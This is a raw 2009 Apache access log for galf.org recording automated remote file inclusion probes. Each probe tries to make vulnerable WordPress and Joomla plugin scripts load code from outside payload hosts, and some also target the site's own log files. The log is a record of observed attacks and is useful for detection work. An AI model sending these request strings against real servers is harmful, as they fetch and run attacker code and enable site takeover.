82.98.136.21 - - [22/Nov/2009:18:33:01 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:33:01 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:34:14 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:34:14 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:34:15 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:34:18 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:34:18 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:34:19 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:35:02 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:35:03 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:35:06 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:36:13 -0800] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:37:54 -0800] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [22/Nov/2009:18:38:04 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
64.22.119.110 - - [22/Nov/2009:18:38:04 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:38:19 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:38:37 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:38:38 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:38:48 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:38:59 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:39:01 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:39:02 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:39:13 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [22/Nov/2009:18:39:41 -0800] "GET /logs/access_090810.log///components/com_freechat/chatwindow.php?uebergabe=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [22/Nov/2009:18:39:41 -0800] "GET /logs///components/com_freechat/chatwindow.php?uebergabe=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [22/Nov/2009:18:39:41 -0800] "GET //components/com_freechat/chatwindow.php?uebergabe=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:44:41 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:46:21 -0800] "GET /?path%5Bdocroot%5D=http://www.vnmhost.net/01.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
82.98.136.21 - - [22/Nov/2009:18:46:25 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.98.136.21 - - [22/Nov/2009:18:46:25 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.vnmhost.net/01.gif? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
82.98.136.21 - - [22/Nov/2009:18:46:30 -0800] "GET /logs/access_090622.log//?path%5Bdocroot%5D=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:48:45 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:48:51 -0800] "GET /logs/access_090629.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:56:39 -0800] "GET /logs/access_090622.log//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.94.118.197 - - [22/Nov/2009:18:57:16 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.94.118.197 - - [22/Nov/2009:18:57:20 -0800] "GET /?sourcedir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
220.94.118.197 - - [22/Nov/2009:18:57:20 -0800] "GET /logs/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
220.94.118.197 - - [22/Nov/2009:18:57:40 -0800] "GET /logs/access_090427.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:59:58 -0800] "GET /logs/access_090622.log//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.6.14 - - [22/Nov/2009:19:00:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.galf.org"
67.19.60.186 - - [22/Nov/2009:19:23:02 -0800] "GET /logs/access_090720.log//?error=http://www.lastuacoe.it/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.19.60.186 - - [22/Nov/2009:19:23:02 -0800] "GET /logs//?error=http://www.lastuacoe.it/id3.txt?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.galf.org"
67.19.60.186 - - [22/Nov/2009:19:23:02 -0800] "GET /?error=http://www.lastuacoe.it/id3.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
67.19.60.186 - - [22/Nov/2009:19:23:46 -0800] "GET /logs/access_090511.log//?error=http://www.lastuacoe.it/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.19.60.186 - - [22/Nov/2009:19:30:01 -0800] "GET /logs/access_090720.log%20//?error=http://www.lastuacoe.it/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.19.60.186 - - [22/Nov/2009:19:30:53 -0800] "GET /logs/access_090921.log%20//?error=http://www.lastuacoe.it/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.19.60.186 - - [22/Nov/2009:19:32:44 -0800] "GET /logs/access_090921.log//?error=http://www.lastuacoe.it/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.19.60.186 - - [22/Nov/2009:19:32:44 -0800] "GET /logs/access.log//?error=http://www.lastuacoe.it/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.19.60.186 - - [22/Nov/2009:19:35:30 -0800] "GET /logs/access_090907.log//?error=http://www.lastuacoe.it/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:19:45:32 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:19:45:32 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:19:45:32 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.vnmhost.net/01.gif? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:45:38 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:45:38 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:45:38 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:45:47 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:45:47 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:45:49 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:45:55 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:45:55 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:19:46:08 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:46:10 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:46:46 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:47:39 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:47:40 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:19:48:38 -0800] "GET /logs/access_090928.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:19:48:38 -0800] "GET /logs/access_090831.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.128.80.210 - - [22/Nov/2009:19:51:12 -0800] "GET /logs/access_090921.log/write.phphttp://www.my-school24.de/files/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.128.80.210 - - [22/Nov/2009:19:51:12 -0800] "GET /write.phphttp://www.my-school24.de/files/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.128.80.210 - - [22/Nov/2009:19:51:12 -0800] "GET /logs/write.phphttp://www.my-school24.de/files/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.128.80.210 - - [22/Nov/2009:19:51:20 -0800] "GET /logs/access.log/write.phphttp://www.my-school24.de/files/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:19:56:07 -0800] "GET /logs/access_090622.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:56:36 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:57:02 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:57:13 -0800] "GET /logs/access_091012.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:57:42 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:57:50 -0800] "GET /logs/access_091012.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:19:58:17 -0800] "GET /logs/access_091012.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.128.80.210 - - [22/Nov/2009:19:58:38 -0800] "GET /ashnews.phphttp://www.my-school24.de/files/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.128.80.210 - - [22/Nov/2009:19:58:38 -0800] "GET /logs/access_090831.log//ashnews.phphttp://www.my-school24.de/files/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.128.80.210 - - [22/Nov/2009:19:58:40 -0800] "GET /logs//ashnews.phphttp://www.my-school24.de/files/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.128.80.210 - - [22/Nov/2009:19:58:50 -0800] "GET /logs/access_090525.log//ashnews.phphttp://www.my-school24.de/files/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.128.80.210 - - [22/Nov/2009:20:02:23 -0800] "GET /pm/lib.inc.phphttp://www.my-school24.de/files/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
64.128.80.210 - - [22/Nov/2009:20:02:24 -0800] "GET /logs//pm/lib.inc.phphttp://www.my-school24.de/files/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
216.139.67.116 - - [22/Nov/2009:20:03:10 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [22/Nov/2009:20:03:10 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [22/Nov/2009:20:03:10 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:20:09:27 -0800] "GET /logs/access_090622.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:20:11:05 -0800] "GET /logs/access_090622.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:20:11:10 -0800] "GET /logs/access_090622.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:20:12:27 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [22/Nov/2009:20:12:36 -0800] "GET /logs/main.php?appserv_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [22/Nov/2009:20:12:36 -0800] "GET /main.php?appserv_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:20:12:47 -0800] "GET /logs/access_090504.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.122 - - [22/Nov/2009:20:14:18 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:16:33 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:16:33 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:16:35 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:16:45 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:16:45 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:16:45 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:20:18:22 -0800] "GET /logs//setup.php?dir=http://rina.shell.tor.hu/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:20:18:22 -0800] "GET /logs/access.log//setup.php?dir=http://rina.shell.tor.hu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:20:18:22 -0800] "GET /setup.php?dir=http://rina.shell.tor.hu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:18:26 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.38.31.183 - - [22/Nov/2009:20:18:26 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.38.31.183 - - [22/Nov/2009:20:18:28 -0800] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.38.31.183 - - [22/Nov/2009:20:18:36 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.38.31.183 - - [22/Nov/2009:20:18:36 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.38.31.183 - - [22/Nov/2009:20:18:36 -0800] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.106.158 - - [22/Nov/2009:20:20:04 -0800] "GET /?S=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:20:14 -0800] "GET /logs/access_090504.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:20:20:40 -0800] "GET /logs/access_090504.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:20:21:23 -0800] "GET //class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:20:21:23 -0800] "GET /logs///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:20:21:23 -0800] "GET /logs/access_090504.log///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:20:21:49 -0800] "GET /logs/access_090504.log%20%20///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:20:22:21 -0800] "GET /logs/access_091019.log%20%20///class/class.dashboard_cms.php?where_framework=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
